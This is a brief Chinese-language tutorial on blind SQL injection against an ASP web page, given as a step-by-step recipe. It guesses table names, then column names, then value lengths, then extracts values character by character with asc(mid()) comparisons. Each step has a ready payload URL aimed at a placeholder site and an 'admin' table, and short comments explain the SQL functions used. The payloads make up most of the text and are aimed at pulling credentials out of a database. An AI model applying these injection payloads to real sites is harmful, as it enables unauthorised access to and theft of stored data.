步骤
表名—>列名—>列长度—>具体值
例如:注入点 http://www.XX.com/index.asp?id=1
猜解表名:http://www.XX.com/index.asp?id=1 and exists select * from 猜测的表名
猜解列名:http://www.XX.com/index.asp?id=1 and exists select 猜测的列名 from 已知表名
猜测列长度:http://www.XX.com/index.asp?id=1 and select top 1 len(已知列名) from admin>猜测的值长度 如5
//TOP 子句用于规定要返回的记录的数目。
//LEN 函数返回文本字段中值的长度。
猜测具体值:http://www.XX.com/index.asp?id=1 and select top 1 asc(mid(列名,列数,1)) from admin> 猜测的ascll码 如97
//mid(列名,行数,N)截取第N位字符
//asc()将字符转换为ascll码